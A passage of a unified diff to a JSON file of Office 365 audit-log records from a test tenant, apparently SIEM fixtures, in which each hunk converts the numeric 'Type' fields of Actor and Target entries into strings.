"ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5414,27 +5414,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5520,27 +5520,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5618,27 +5618,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5724,27 +5724,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5822,27 +5822,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5928,27 +5928,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6026,27 +6026,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6132,27 +6132,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6230,27 +6230,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6336,27 +6336,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6434,27 +6434,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6540,27 +6540,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6641,27 +6641,27 @@ "Target": [ { "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 2 + "Type": "2" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6747,27 +6747,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6848,27 +6848,27 @@ "Target": [ { "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 2 + "Type": "2" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6951,23 +6951,23 @@ "Actor": [ { "ID": "fim_password_service@support.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "100300008060F582", - "Type": 3 + "Type": "3" }, { "ID": "User_00000000-0000-0000-0000-000000000000", - "Type": 2 + "Type": "2" }, { "ID": "00000000-0000-0000-0000-000000000000", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "d51ef8df-6617-4356-b8d4-89ad7efef31e", @@ -7035,23 +7035,23 @@ "Target": [ { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7123,27 +7123,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7221,27 +7221,27 @@ "Target": [ { "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Microsoft Graph", - "Type": 1 + "Type": "1" }, { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 2 + "Type": "2" }, { "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7327,27 +7327,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7425,27 +7425,27 @@ "Target": [ { "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Microsoft Graph", - "Type": 1 + "Type": "1" }, { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 2 + "Type": "2" }, { "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7531,27 +7531,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7629,27 +7629,27 @@ "Target": [ { "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Microsoft Graph", - "Type": 1 + "Type": "1" }, { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 2 + "Type": "2" }, { "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7735,27 +7735,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7833,27 +7833,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7939,27 +7939,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8037,27 +8037,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8143,27 +8143,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8241,27 +8241,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8347,27 +8347,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8445,27 +8445,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8551,27 +8551,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8649,27 +8649,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8755,27 +8755,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8853,27 +8853,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8959,27 +8959,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -9057,27 +9057,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -9163,27 +9163,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -9261,27 +9261,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -9367,27 +9367,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -9465,27 +9465,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -9571,27 +9571,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -9669,27 +9669,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": 